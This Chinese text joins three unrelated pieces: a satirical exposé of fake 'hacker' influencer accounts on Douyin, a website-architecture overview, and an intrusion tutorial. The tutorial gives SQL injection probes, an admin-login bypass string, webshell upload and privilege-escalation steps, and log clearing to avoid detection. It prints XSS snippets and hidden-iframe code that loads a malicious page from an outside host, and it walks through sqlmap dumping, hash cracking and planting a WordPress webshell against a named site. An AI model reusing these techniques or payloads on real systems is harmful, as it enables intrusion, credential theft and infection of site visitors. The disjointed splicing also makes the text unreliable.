國(guó)人在表達(dá)感情方面,總是很含蓄。
比如,在相親時(shí),越來(lái)越多的人不會(huì)直接了當(dāng)?shù)膯?wèn):“月薪多少?”“有車嗎?”“有房嗎?”
而是這樣問(wèn):“你小區(qū)的物業(yè)費(fèi)和停車費(fèi)多少錢?”
你瞧,多精辟的問(wèn)法,一舉多得。
同樣的,當(dāng)你成為別人眼里的韭菜時(shí),他也不會(huì)直接了當(dāng)?shù)哪冒训墩驹谀忝媲啊?/p>
而且采用一種很先進(jìn)的手法:包裝。
文 | 小胸弟
01 你和“黑客教父”之間,也許只差一個(gè)“入駐”。
有一群人,他們隱匿在互聯(lián)網(wǎng)中,神秘莫測(cè),破譯、入侵,每一個(gè)關(guān)鍵詞都能引來(lái)普通人無(wú)限的遐想,一個(gè)個(gè)生澀難懂的字符亂碼似的堆砌在一起,卻上天入地,無(wú)所不能。
他們、就是黑客。
你想成為黑客嗎?不是技術(shù)至上,而是粉絲成群的那種。
想的話,接著往下看。
首先,萬(wàn)丈高樓平地起,最基礎(chǔ)也是最關(guān)鍵的一步,你需要給自己創(chuàng)建一個(gè)黑客形象。以下幾個(gè)方面可供參考:
名字,要有俠義內(nèi)涵,不能常規(guī),要一眼看上去就不一般的那種;
頭像,一定要黑的深沉,滲透出神秘莫測(cè)的氣息;
簽名,務(wù)必要跟上節(jié)奏,既要表明自己的身份,還要接地氣,語(yǔ)氣要平易近人。
有了初步形象,接下來(lái),你需要一群崇拜到想把你親親抱抱舉高高的粉絲。
如何才能集中獲得一群粉絲呢?首選人流量大的娛樂(lè)平臺(tái)。
只需將第一步中精心打造的黑客形象,運(yùn)用到平臺(tái)中即可,不過(guò),為了快速吸粉,還需要一個(gè)很關(guān)鍵的步驟。
最近,抖音上有幾個(gè)很火的黑客教父,大家搜關(guān)鍵字“黑客教父”就能找到。
為什么說(shuō)這幾個(gè)賬號(hào)火呢?因?yàn)樗鼈兊牡谝粋€(gè)作品,就成功吸引了數(shù)萬(wàn)名粉絲,而讓人難以置信的是,成功吸粉的視頻,不但不精致,反而是粗制濫造,完全就是用幾張圖片拼湊出來(lái)的。
但它之所以能夠成功吸粉,正是因?yàn)樵靹?shì)。
“xx入駐抖音,我是一名網(wǎng)絡(luò)愛(ài)好者、黑客,以后我會(huì)更新很多技術(shù)教學(xué),你,愿意做我的第一批粉絲嗎?想學(xué)什么評(píng)論出來(lái),我會(huì)盡力滿足你們!”
你瞧這文案,“入駐”一詞,拔高了自己的地位,“愿意嗎”,迅速拉近與粉絲的距離,“盡力滿足”,達(dá)成與粉絲的互動(dòng),造勢(shì)成功。
隨后,他們會(huì)陸陸續(xù)續(xù)發(fā)一些簡(jiǎn)短的教程,比如:
樓下有人評(píng)論:“從你們外行人角度看,也許覺(jué)得很牛逼,但是從我內(nèi)行人的角度看,也是一臉懵逼?!?/p>
對(duì)大部分人來(lái)說(shuō),看不懂、學(xué)不會(huì)都是因?yàn)樽约禾?,跟不上黑客大佬的?jié)奏,崇拜之情更盛。
當(dāng)然,光在平臺(tái)上有粉絲捧場(chǎng)還不夠,你的目標(biāo)是成為一名知名黑客,必須突出知名。具體操作包括但不限于:
花點(diǎn)小錢,整幾個(gè)小號(hào),在百度貼吧等人流量較大的位置,自問(wèn)自答。
比如:你知道XXX嗎?聽(tīng)說(shuō)他很厲害。
當(dāng)然,他技術(shù)很牛的。
又或者,寫篇關(guān)于自己的專訪,越牛逼、越傳奇越好,然后把它發(fā)布到各個(gè)新聞平臺(tái),這樣,只要有人通過(guò)搜索引擎輸入相關(guān)名字,就能看到你的事跡了。
固定經(jīng)營(yíng)幾個(gè)社交平臺(tái),某空間、某博都行,平日里無(wú)事,多發(fā)一些能夠彰顯自己技術(shù)的動(dòng)態(tài),自己不懂沒(méi)關(guān)系,隨便找谷哥度娘一下,但一定要深?yuàn)W,一般人看不懂的那種。
重點(diǎn)是,只要營(yíng)造氛圍就好,千萬(wàn)別發(fā)自拍,一定要保持神秘。
另外,花幾十塊錢弄個(gè)html黑頁(yè),又能迷惑一群小白,你只要手叉腰擺出高級(jí)姿態(tài)就行。
按以上流程走下來(lái),只要在搜索引擎上輸入你的名字,你精心打造的過(guò)往、專訪、動(dòng)態(tài),就可以毫無(wú)保留地呈現(xiàn)在他人眼中。
如此這般,你已經(jīng)是一名“知名黑客教父”了,擁有一群心懷崇拜的粉絲以后,集中拉個(gè)群圈養(yǎng)起來(lái),留待日后享用。
02 有錢的捧個(gè)錢場(chǎng),沒(méi)錢的捧個(gè)人場(chǎng)。
在某個(gè)黑客教父的視頻后,我通過(guò)給出的引流QQ號(hào),加入了幾個(gè)不同分享群,發(fā)現(xiàn)入群的人可謂是源源不斷,說(shuō)明這幾位“黑客教父”在抖音上的拉新,效果還是非常顯著。
在群里潛水了幾天,發(fā)現(xiàn)雖然是不同的群,但在留存、促活和簡(jiǎn)單變現(xiàn)這幾個(gè)環(huán)節(jié),還是非常類似的。
先說(shuō)留存。如何讓已經(jīng)進(jìn)群的人愿意長(zhǎng)期停留,最重要的一點(diǎn),就是你分享的內(nèi)容,對(duì)群里的人來(lái)說(shuō)是否有價(jià)值。
那么,如何找到群成員的興趣點(diǎn)呢?很簡(jiǎn)單,粉絲的喜好和需求大多都表露在抖音的評(píng)論中。
再說(shuō)促活。讓群氣氛活躍起來(lái),才能順利進(jìn)行后一步的變現(xiàn),一個(gè)僵尸群,就沒(méi)有太大的價(jià)值。
鑒于是黑客性質(zhì)的群,所以群成員中男性比例占據(jù)絕對(duì)地位,這時(shí)候,一些簡(jiǎn)單的分享,就能很好的起到促活作用,比如美女壁紙、低段位薅羊毛活動(dòng),還包括一些低端的軟件,像紅包外掛、強(qiáng)制聊天程序及破解程序等,常分享常活躍。
氣氛活了,就可以順理成章的實(shí)施變現(xiàn)。我所在的幾個(gè)群,都是非常簡(jiǎn)單的變現(xiàn),就是那種看起來(lái)互惠互利、雙贏的變現(xiàn)方法。
像是淘寶優(yōu)惠券合集、軟件推薦下載之類的,群主都可以從中抽水。
積少成多,蚊子再小也是肉。
03 隔行,你就是韭菜。
看了抖音上這些“黑客教父”們發(fā)布的作品,以及聚集的熱情粉絲,老師傅點(diǎn)燃一支煙,露出了少見(jiàn)的詫異表情,大概是驚異這些“黑客”火的毫無(wú)道理。
于是,為了驗(yàn)證單純崇拜黑客的小白,到底能有多白,我和老師傅試了一試。
注冊(cè)了一個(gè)抖音賬號(hào),名字中專門漏出“黑客”字眼,挑選了一個(gè)神秘莫測(cè)看不清臉的頭像,簡(jiǎn)單的圖片和文字拼接后,新鮮出爐了一個(gè)作品,配上文案:你們有什么需求,評(píng)論告訴我,我來(lái)滿足你們。
簡(jiǎn)簡(jiǎn)單單一個(gè)作品,意外收獲了200多個(gè)贊,要知道我有一個(gè)朋友,活躍抖音半年了,每個(gè)作品的贊還不超過(guò)10個(gè)。
翻了翻評(píng)論,按目的可以劃分如下:
隔行如隔山,隔了這座山,你就是別人眼里的韭菜,割你沒(méi)商量。
THE END
超級(jí)英雄還是超級(jí)狗熊,你真能分得清嗎?
之前在黑客技術(shù)文章中講了很多黑客技術(shù)原理,近期我將通過(guò)文章講述一些黑客實(shí)戰(zhàn)內(nèi)容,想了解黑客實(shí)戰(zhàn)技術(shù)的朋友可以多關(guān)注我的文章。
今天就以本篇文章內(nèi)容給大家講述一下黑客"入侵網(wǎng)站的"基本流程以及技術(shù)實(shí)現(xiàn)過(guò)程!
常見(jiàn)的幾種基本架構(gòu)如下:
1、單機(jī)模式
應(yīng)用程序、數(shù)據(jù)庫(kù)、文件等所有資源都集中在一臺(tái) Server上,典型案例:基于 LAMP 架構(gòu)的 PHP 網(wǎng)站;
單機(jī)時(shí)代(純依賴RDBMS)
優(yōu)點(diǎn):簡(jiǎn)單、快速迭代達(dá)成業(yè)務(wù)目標(biāo);缺點(diǎn):存在單點(diǎn)、談不上高可用;技術(shù)點(diǎn):應(yīng)用設(shè)計(jì)要保證可擴(kuò)展;
2、單機(jī)+緩存模式
有一定的業(yè)務(wù)量和用戶規(guī)模了,想提升網(wǎng)站速度,于是,緩存出場(chǎng)了。
單機(jī)時(shí)代+緩存出場(chǎng)
優(yōu)點(diǎn):簡(jiǎn)單有效、方便維護(hù);缺點(diǎn):存在單點(diǎn)、談不上高可用;技術(shù)點(diǎn):客戶端(瀏覽器)緩存、前端頁(yè)面緩存、頁(yè)面片段緩存、本地?cái)?shù)據(jù)緩存/數(shù)據(jù)庫(kù)緩存、遠(yuǎn)程緩存;
3、數(shù)據(jù)服務(wù)與應(yīng)用分離模式
用戶量每天在增長(zhǎng),數(shù)據(jù)庫(kù)瘋狂讀寫,逐漸發(fā)現(xiàn)一臺(tái)服務(wù)器快撐不住了。于是,決定把數(shù)據(jù)服務(wù)和APP做分離。
數(shù)據(jù)服務(wù)與應(yīng)用分離
優(yōu)點(diǎn):簡(jiǎn)單有效、方便維護(hù)、提高不同Server對(duì)硬件資源的利用率;缺點(diǎn):存在單點(diǎn)、談不上高可用;技術(shù)點(diǎn):文件服務(wù)器部署、數(shù)據(jù)庫(kù)服務(wù)器,擴(kuò)展數(shù)據(jù)訪問(wèn)模塊;
分離后三臺(tái) Server 對(duì)硬件資源的需求各不相同:
4、數(shù)據(jù)庫(kù)讀寫分離模式
單臺(tái)數(shù)據(jù)庫(kù)也感覺(jué)快撐不住了,一般都會(huì)嘗試做"讀寫分離"。由于大部分互聯(lián)網(wǎng)"讀多寫少"的特性所決定的。Salve的臺(tái)數(shù),取決于按業(yè)務(wù)評(píng)估的讀寫比例。
數(shù)據(jù)庫(kù)讀寫分離
優(yōu)點(diǎn):簡(jiǎn)單有效、降低數(shù)據(jù)庫(kù)單臺(tái)壓力;缺點(diǎn):讀寫分離,增加程序難度,架構(gòu)變復(fù)雜,維護(hù)難度增加;技術(shù)點(diǎn):數(shù)據(jù)庫(kù)主從同步部署,擴(kuò)展數(shù)據(jù)訪問(wèn)模塊,實(shí)現(xiàn)讀寫分離;
5、應(yīng)用服務(wù)集群模式
數(shù)據(jù)庫(kù)層面是緩解了,但是應(yīng)用程序?qū)用嬉渤霈F(xiàn)了瓶頸,由于訪問(wèn)量增大,加上早期程序員水平有限寫的代碼也很爛,人員流動(dòng)性也大,很難去維護(hù)和優(yōu)化。所以,很常用的辦法還是"堆機(jī)器"。
應(yīng)用出現(xiàn)瓶頸 負(fù)載均衡集群
優(yōu)點(diǎn):增加服務(wù)器和HA機(jī)制,系統(tǒng)性能及可用性得到保證;缺點(diǎn):應(yīng)用之間緩存、Session一致性問(wèn)題;技術(shù)點(diǎn):負(fù)載均衡;
通過(guò)集群解決高并發(fā)、海量數(shù)據(jù)問(wèn)題的常用手段,實(shí)現(xiàn)系統(tǒng)的可伸縮性。通過(guò)負(fù)載均衡調(diào)度器,可將用戶訪問(wèn)分發(fā)到集群中的某臺(tái) Server 上,應(yīng)用服務(wù)器的負(fù)載壓力不再成為整個(gè)網(wǎng)站的瓶頸。
6、集中式緩存、Session集中存儲(chǔ)
加機(jī)器誰(shuí)都會(huì)加,關(guān)鍵是加完之后得有效果,加完之后可能會(huì)引發(fā)一些問(wèn)題。例如非常常見(jiàn)的:集群應(yīng)用之間頁(yè)面輸出緩存和本地緩存一致性的問(wèn)題,Session保存的問(wèn)題......。
集中式緩存 Session集中存儲(chǔ)
優(yōu)點(diǎn):應(yīng)用之間緩存、Session一致,存儲(chǔ)無(wú)限制,可以擴(kuò)展;缺點(diǎn):不如本地緩存訪問(wèn)快,緩存服務(wù)器、Session服務(wù)器等仍存在單點(diǎn)問(wèn)題;技術(shù)點(diǎn):緩存服務(wù)器部署、Session集中存儲(chǔ)方案;
7、動(dòng)靜分離
動(dòng)靜分離也是提高網(wǎng)站響應(yīng)速度的一種常用方式。將動(dòng)態(tài)請(qǐng)求與靜態(tài)請(qǐng)求分離開(kāi),盡量減少對(duì)應(yīng)用服務(wù)器的壓力。同時(shí),可以再進(jìn)一步對(duì)靜態(tài)請(qǐng)求,進(jìn)行緩存,以加快響應(yīng)速度。可以需要開(kāi)發(fā)人員配合(把靜態(tài)資源放獨(dú)立站點(diǎn)下),也可以不需要開(kāi)發(fā)人員配合(利用7層反向代理來(lái)處理,根據(jù)后綴名等信息來(lái)判斷資源類型)。
使用動(dòng)靜分離
優(yōu)點(diǎn):減輕應(yīng)用負(fù)載壓力,針對(duì)靜態(tài)文件緩存;缺點(diǎn):靜態(tài)文件緩存更新失效問(wèn)題;技術(shù)點(diǎn):動(dòng)靜分離、靜態(tài)文件緩存方案;
8、反向代理和CDN加速網(wǎng)站響應(yīng)
使用反向代理和CDN加速網(wǎng)站響應(yīng):CDN 和反向代理的基本原理都是緩存,區(qū)別在于:
1. CDN部署在網(wǎng)絡(luò)提供商的機(jī)房;
2. 反向代理則部署在網(wǎng)站的中心機(jī)房;
使用 CDN 和反向代理的目的都是盡早返回?cái)?shù)據(jù)給用戶,一方面加快用戶訪問(wèn)速度,另一方面也減輕后端服務(wù)器的負(fù)載壓力。
使用反向代理和 CDN 加速網(wǎng)站響應(yīng)
優(yōu)點(diǎn):減輕應(yīng)用負(fù)載壓力,異地緩存有效解決不同地方用戶訪問(wèn)過(guò)慢的問(wèn)題;缺點(diǎn):成本大幅增加,架構(gòu)進(jìn)一步復(fù)雜化,也維護(hù)難度進(jìn)一步增大,靜態(tài)文件緩存更新失效問(wèn)題;技術(shù)點(diǎn):CDN、反向代理方案;
9、使用NoSQL和搜索引擎
到這里,已經(jīng)基本做到了DB層面和應(yīng)用層面的橫向擴(kuò)展了,可以開(kāi)始關(guān)注一些其它方面,例如:站內(nèi)搜索的精準(zhǔn)度,對(duì)DB的依賴,開(kāi)始引入全文索引、NoSQL。
NoSQL和搜索引擎都是源自互聯(lián)網(wǎng)的技術(shù)手段,對(duì)可伸縮的分布式特性具有更好的支持。應(yīng)用服務(wù)器則通過(guò)一個(gè)統(tǒng)一數(shù)據(jù)訪問(wèn)模塊訪問(wèn)各種數(shù)據(jù),減輕應(yīng)用程序管理諸多數(shù)據(jù)源的麻煩。
使用NoSQL和搜索引擎
優(yōu)點(diǎn):降低DB依賴;缺點(diǎn):單點(diǎn)問(wèn)題,談不上高可用;技術(shù)點(diǎn):NoSQL、搜索引擎、分布式;
1、信息收集
1) Whois信息--注冊(cè)人、電話、郵箱、DNS、地址
2) Googlehack--敏感目錄、敏感文件、后臺(tái)地址
3) 服務(wù)器IP--Nmap掃描、端口對(duì)應(yīng)的服務(wù)、C段
4) 旁注--Bing查詢、腳本工具
5) 如果遇到CDN--Cloudflare(繞過(guò))、從子域入手(mail,postfix)、DNS傳送域漏洞
6) 服務(wù)器、組件(指紋)--操作系統(tǒng)、web server(apache,nginx,iis)、腳本語(yǔ)言,數(shù)據(jù)庫(kù)類型
2、漏洞挖掘
1) 探測(cè)Web應(yīng)用指紋--如博客類:Wordpress、Emlog、Typecho、Z-blog,社區(qū)類:Discuz、PHPwind、Dedecms,StartBBS、Mybb等等,PHP腳本類型:Dedecms、Discuz!、PHPCMS、PHPwind
2) XSS、CSRF、SQLinjection、權(quán)限繞過(guò)、任意文件讀取、文件包含...
3) 上傳漏洞--截?cái)唷⑿薷摹⒔馕雎┒?/p>
4) 有無(wú)驗(yàn)證碼--進(jìn)行暴力破解
3、漏洞利用
1) 思考目的性--達(dá)到什么樣的效果
2) 隱藏,破壞性--根據(jù)探測(cè)到的應(yīng)用指紋尋找對(duì)應(yīng)的exp攻擊載荷或者自己編寫
3) 開(kāi)始漏洞攻擊,獲取相應(yīng)權(quán)限,根據(jù)場(chǎng)景不同變化思路拿到webshell
4、權(quán)限提升
1) 根據(jù)服務(wù)器類型選擇不同的攻擊載荷進(jìn)行權(quán)限提升
2) 無(wú)法進(jìn)行權(quán)限提升,結(jié)合獲取的資料開(kāi)始密碼猜解,回溯信息收集
5、植入后門
1) 隱蔽性
2) 定期查看并更新,保持周期性
6、日志清理
1) 偽裝,隱蔽,避免激警他們通常選擇刪除指定日志
2) 根據(jù)時(shí)間段,find相應(yīng)日志文件 太多太多。
三、 黑客入侵網(wǎng)站的常規(guī)思路方法
1、經(jīng)典注入
通常,判斷一個(gè)網(wǎng)站是否存在注入點(diǎn),可以用',and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,來(lái)判斷,如果and 1=1正常返回頁(yè)面,1=2錯(cuò)誤,或者找不到,那么就存在注入點(diǎn)
2、萬(wàn)能密碼OR漏洞
萬(wàn)能密碼'or'='or',可以用在后臺(tái)管理輸入,有的網(wǎng)站由于沒(méi)有過(guò)濾OR漏洞,輸入OR直接就可以突破,一般漏洞存在于ASP類型的網(wǎng)站
3、爆庫(kù)
爆庫(kù),可以理解為爆出數(shù)據(jù)庫(kù)下載,用爆庫(kù)之類的工具可以直接就獲得管理員用戶和密碼,%5C為十六進(jìn)制的\符號(hào),而數(shù)據(jù)庫(kù)大于5.0就可以進(jìn)行爆庫(kù),如在PHP手工高級(jí)注入時(shí),用VERSION()這個(gè)變量猜出網(wǎng)站數(shù)據(jù)庫(kù)版本,如果一個(gè)網(wǎng)站數(shù)據(jù)庫(kù)大于5.0,且是ACESS數(shù)據(jù)庫(kù),那么提交地址是:http://www.xxx.com/rpc/show24.asp?id=127,我們直接把%5C加到RPC后面,因?yàn)?5C是爆二級(jí)目錄,所以應(yīng)該是這樣,http://www.xxx.com/rpc%5c/show24.asp?id=127,而%23是代表#,如果管理員為了防止他人非法下載數(shù)據(jù)庫(kù),而把數(shù)據(jù)庫(kù)改成#database.mdb,這樣防止了,如果頁(yè)面地址為http://www.xx.com/rpd/#database.mdb,是這樣的,那么我們把%23加到替換#,http://www.xx.com/rpd/%23database.mdb
4、COOKIE中轉(zhuǎn),SQL防注入程序,提醒你IP已被記錄
COOKIE中轉(zhuǎn),SQL防注入,如果檢測(cè)一個(gè)網(wǎng)站時(shí),彈出這樣一個(gè)對(duì)話框,上面出現(xiàn)SQL防注入程序提醒的字語(yǔ),那么我們可以利用COOKIE中轉(zhuǎn),注入中轉(zhuǎn)來(lái)突破,方法是先搭建一個(gè)ASP環(huán)境(且網(wǎng)站為ASP網(wǎng)站),然后打開(kāi)中轉(zhuǎn)工具,記住一個(gè)網(wǎng)站的頁(yè)面地址粘貼進(jìn)工具里,值是多少就寫多少,生成,把生成的文件放到目錄里,接下來(lái),打開(kāi)網(wǎng)頁(yè),輸入http://127.0.0.1:(端口)/目錄里文件,如果正常,那么輸入http://127.0.0.1:端口/值(目錄文件)?提交值,那么拿到工具里猜表名,列名了
5、手工
ASP手工語(yǔ)句表名 and exists (select * from 表名)
列名 and (select count(列名) from 表名)>0
長(zhǎng)度 and (select top 1 len(username) from admin)>0
內(nèi)容 and (select top 1 asc(mid(username,1,1)) from admin)>100
PHP手工語(yǔ)句:order by(猜字段),and 1=2 union select (字段數(shù))and 1=2 union selsect from(位置)
幾個(gè)常用變量 ,USER(),VERSION()<數(shù)據(jù)庫(kù)版本),database()<數(shù)據(jù)庫(kù)名稱>
6、抓包拿WEBSHELL
如果進(jìn)入后臺(tái)發(fā)現(xiàn),點(diǎn)數(shù)據(jù)庫(kù)備份的時(shí)候發(fā)現(xiàn)找不到,可以通過(guò)抓包來(lái)獲得上傳,拿到WEBSHELL,工具WOSCK抓包,一張圖片,一個(gè)ASP馬,自行搭建一個(gè)上傳地址,UPLOAD加載,UPFILE上傳,COOKIS=( )
7、數(shù)據(jù)庫(kù)備份拿WEBSHELL和一句話木馬入侵
通常進(jìn)入后臺(tái)了,發(fā)現(xiàn)有數(shù)據(jù)庫(kù)備份,拿WEBSHELL吧,找一個(gè)添加產(chǎn)品的地方,傳一個(gè)大馬,格式為JPG圖片,然后把圖片地址粘貼到數(shù)據(jù)庫(kù)備份那里,給起個(gè)名字,如SHELL.ASP,然后合地址訪問(wèn)的時(shí)候就進(jìn)入webshell了,一句話木馬入侵,先編輯記事本,加入一句話,改為2.jpg,然后備份,訪問(wèn),發(fā)現(xiàn)500內(nèi)部服務(wù)器錯(cuò)誤,證明一句話成功,接下來(lái)用一句話木馬客戶端連接,得到路徑頁(yè)面,然后改下馬名,輸入大馬內(nèi)容,提交,得到WEBSHELL
8、DB權(quán)限差異備份拿WEBSHELL
如果一個(gè)網(wǎng)站注入點(diǎn)是MYSQL數(shù)據(jù)庫(kù),且是DB權(quán)限,或者是SA權(quán)限,能夠列目錄,那么就好辦了,找到網(wǎng)站的目錄,目錄通常在D和E盤,備份個(gè)小馬,合地址訪問(wèn)看看成功沒(méi),直接備份大馬貌似不行,成功后,再輸入大馬內(nèi)容,拿到WEBSHELL
9、找后臺(tái)
找后臺(tái),一般默認(rèn)為admin,admin/admin.asp,admin/login.asp,.admin_login.asp,manage/login.asp,login.asp,logon,user.asp,admin/index.asp,當(dāng)然,這只是默認(rèn),一些大網(wǎng)站不可能還用admin作為后臺(tái),有的隱藏很深,可以簡(jiǎn)單用site:網(wǎng)站 inurl:后臺(tái)來(lái)猜,或者下載源HTML文件分析找出后臺(tái),或者用各種工具來(lái)掃描了,方法很多的
10、腳本提示
有的網(wǎng)站要求進(jìn)入后臺(tái)會(huì)出現(xiàn)一個(gè)腳本提示,就像VB編程里INPUTBOX "",一個(gè)對(duì)話輸入框,我們輸入administrator突破,admin代表以管理員身份來(lái)進(jìn)入
11、php后門和EWEBEDITOR編輯器入侵
PHP后門,如之前爆出的DISZ漏洞,在一個(gè)PHP網(wǎng)站后面加C.PHP,如果出現(xiàn)1,那么傳個(gè)PHP馬就拿到WEBSHELL,EWEBEDITOR編輯器入侵,是很快速的方式,設(shè)置好上傳文件類型,傳ASA,或者其他的格式,然后訪問(wèn)拿到WEBSHELL,如沒(méi)有直接加語(yǔ)句拿到WEBSHELL
12、上傳漏洞
有的網(wǎng)站雖然沒(méi)有注入點(diǎn),但存在一個(gè)上傳漏洞,那么我們?nèi)绾蝸?lái)利用了,首先,打開(kāi)上傳地址看是否存在,如果有,試想傳一個(gè)ASP大馬是不行的,那么傳一句話看看,先看能成功不,用明小子來(lái)上傳,動(dòng)網(wǎng),動(dòng)力,動(dòng)感,喬客4種方式,頁(yè)面地址格式要對(duì)應(yīng),如果一個(gè)網(wǎng)站地址彈出對(duì)話框,顯示上傳成功,那么證明可以拿到WEBSHELL,傳馬,另外有的沒(méi)有任何顯示,直接空的,那么可以構(gòu)建兩個(gè)上傳,第一個(gè)傳JPG的圖片,第二個(gè)傳ASP馬(大馬),記住,大馬后面要有個(gè)空格才行,如果一個(gè)網(wǎng)站地址出現(xiàn)文件類型不正確,請(qǐng)重新上傳,那么證明%90可以拿到WEBSHELL,只是格式不對(duì),不允許,改后綴,只要是網(wǎng)站沒(méi)有過(guò)濾的格式,如果一個(gè)網(wǎng)站地址顯示請(qǐng)登陸再上傳,那么證明沒(méi)有拿到COOKIS,思路是在該網(wǎng)站注冊(cè)一個(gè)用戶,得到COOKIS,然后上傳就成功了
13、簡(jiǎn)單提權(quán)拿下服務(wù)器和SERV提權(quán)和pcanywhere三方提權(quán)
簡(jiǎn)單拿下服務(wù)器,也就是拿下網(wǎng)站IP主機(jī),首先我們需要一個(gè)WEBSHELL,然后看看組件信息,看看路徑可讀可以寫不,如果有一個(gè)可以,那么來(lái)到CMD命令下,首先輸入可寫的文件內(nèi)容,執(zhí)行命令加一個(gè)帳號(hào)和最高管理權(quán)限,然后輸入netstat -an,得到主機(jī)連接端口,然后用3389連接進(jìn)入,讓其成為肉雞(最好),這樣比較隱蔽我們操作
14、反查入侵和旁注和社會(huì)工程學(xué)
反查IP入侵,也就是入侵21,端口,首先我們?nèi)肭志W(wǎng)站先PING WWW.XXX.COM ,出IP,然后到反查IP站點(diǎn)查掛了多少個(gè)域名,接下來(lái),添加webmaster@地址,加入字典,(里面多收集可能的口令,如123,321,456),然后用流光探測(cè)密碼,登陸ftp://ip,輸入用戶和密碼,改掉信息等等,社會(huì)工程學(xué)X-WAY,來(lái)得到FTP密碼,也需要收集,并不是每個(gè)都行,總之是自己的經(jīng)驗(yàn)
15、跨站腳本攻擊
跨站(CSS),被動(dòng)攻擊,現(xiàn)在需要更多的思路和經(jīng)驗(yàn)了
三段經(jīng)典跨站代碼
<script>alert("跨站開(kāi)始")</script>
<script>alert("document.cookie")</script>
<script>window.open(http://www.hackgirl.net)</script>
16、特殊空格
利用TAB制作的特殊空格,然后注冊(cè)時(shí)輸入空格,加管理名字,隨便在網(wǎng)站上找個(gè)斑竹,或者管理的名字,這樣來(lái)注冊(cè),有時(shí)自己注冊(cè)的這個(gè)也會(huì)變成管理員
17、改主頁(yè)
改主頁(yè),拿到WEBSHELL后,先找出首頁(yè)文件,一般為index.asp,index.php.index.jsp,index.html,然后來(lái)到站點(diǎn)根目錄,編輯index.asp(首頁(yè)),清空,最好備份,輸入自己的主頁(yè)代碼(黑頁(yè)),保存,再訪問(wèn)時(shí)已經(jīng)變成自己想要的結(jié)果了
18、掛馬
首先在WEBSHELL里,建立一個(gè)文本,改為1.htm,接下來(lái)在主頁(yè)最下面掛
兩段經(jīng)典掛馬代碼
<html>
<iframe src="http://www.xxxx.com/2.htm" width="0" height="0" frameborder="0"></iframe>
</html>
<SCRIPT language=javascript>
window.open("http://www.xxx.com/2.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
假設(shè)入侵的網(wǎng)站域名是hack-test.com
第一步:用ping命令獲取網(wǎng)站服務(wù)器的IP地址
現(xiàn)在我們獲取了網(wǎng)站服務(wù)器的IP地址為:173.236.138.113
第二步:尋找同一服務(wù)器上的其它網(wǎng)站,我們使用sameip.org.
26 sites hosted on IP Address 173.236.138.113
173.236.138.113上有26個(gè)網(wǎng)站,很多黑客為了攻破你的網(wǎng)站可能會(huì)檢查同服務(wù)器上的其它網(wǎng)站,但是本次是以研究為目標(biāo),我們將拋開(kāi)服務(wù)器上的其它網(wǎng)站,只針對(duì)本次測(cè)試的網(wǎng)站來(lái)進(jìn)行入侵檢測(cè)。
第三步:查詢關(guān)于網(wǎng)站的以下信息:
1. DNS records (A, NS, TXT, MX and SOA)
2. Web Server Type (Apache, IIS, Tomcat)
3. Registrar (the company that owns your domain)
4. Your name, address, email and phone
5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)
6. Your server OS (Unix,Linux,Windows,Solaris)
7. Your server open ports to internet (80, 443, 21, etc.)
讓我們開(kāi)始找網(wǎng)站的DNS記錄,我們用who.is來(lái)完成這一目標(biāo).
發(fā)現(xiàn)DNS記錄如下:
確定web服務(wù)器的類型:
發(fā)現(xiàn)Web服務(wù)器是apache,接下來(lái)確定它的版本.
IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank: 1 Month:3,213,968 3 Month: 2,161,753
Page Views per Visit: 1 Month: 2.0 3Month: 3.7
接下來(lái)尋找網(wǎng)站域名的注冊(cè)信息,你的電話、郵箱、地址等
現(xiàn)在已經(jīng)獲取了你的網(wǎng)站域名的注冊(cè)信息,包括你的重要信息等.
接下來(lái)可以通過(guò)backtrack5中的whatweb來(lái)獲取網(wǎng)站服務(wù)器操作系統(tǒng)類型和服務(wù)器的版本:
發(fā)現(xiàn)網(wǎng)站使用了著名的php整站程序wordpress,服務(wù)器的的系統(tǒng)類型為FedoraLinux,Web服務(wù)器版本Apache 2.2.15。
繼續(xù)查看網(wǎng)站服務(wù)器開(kāi)放的端口,用滲透測(cè)試工具nmap:
1、Find services that run on server(查看服務(wù)器上運(yùn)行的服務(wù))
2、Find server OS(查看操作系統(tǒng)版本)
只有80端口是開(kāi)放的,操作系統(tǒng)是Linux2.6.22(Fedora Core 6),現(xiàn)在已經(jīng)收集了所有關(guān)于網(wǎng)站的重要信息,接下來(lái)開(kāi)始掃描尋找漏洞,比如:
Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF等等
3、用Nikto來(lái)收集漏洞信息:
root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com
4、用到Backtrack 5 R1中的W3AF 工具:
root@bt:/pentest/web/w3af#./w3af_gui
輸入要檢測(cè)的網(wǎng)站地址,選擇完整的安全審計(jì)選項(xiàng)
稍等一會(huì),將會(huì)看到掃描結(jié)果
發(fā)現(xiàn)你的網(wǎng)站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.讓我們來(lái)探討SQL注入漏洞.
http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220
第四步:通過(guò)工具發(fā)現(xiàn)這個(gè)URL存在SQL注入,我們通過(guò)Sqlmap來(lái)檢測(cè)這個(gè)url.
Using sqlmap with –u url
輸入N按回車鍵繼續(xù)
發(fā)現(xiàn)你的網(wǎng)站存在mysql顯錯(cuò)注入,mysql數(shù)據(jù)庫(kù)版本是5.0. 我們通過(guò)加入?yún)?shù)"-dbs"來(lái)嘗試采集數(shù)據(jù)庫(kù)名
發(fā)現(xiàn)三個(gè)數(shù)據(jù)庫(kù),接下來(lái)通過(guò)參數(shù)"-D wordpress -tables"來(lái)查看wordpress數(shù)據(jù)庫(kù)的所有表名
通過(guò)參數(shù)"-T wp_users –columns "來(lái)查看wp_users表中的字段.
接下來(lái)猜解字段user_login和user_pass的值.用參數(shù)"-C user_login,user_pass–dump"
會(huì)發(fā)現(xiàn)用戶名和密碼hashes值
第五步:通過(guò)以下在線破解網(wǎng)站來(lái)破解密碼hashes
http://www.onlinehashcrack.com/free-hash-reverse.php
第六步:登陸wordpress的后臺(tái)wp-admin
嘗試上傳php webshell到服務(wù)器,以方便運(yùn)行一些linux命令.在插件頁(yè)面尋找任何可以編輯的插件.我們選擇Textile這款插件,編輯插入我們的php webshell,點(diǎn)擊更新文件,然后訪問(wèn)我們的phpwebshell.
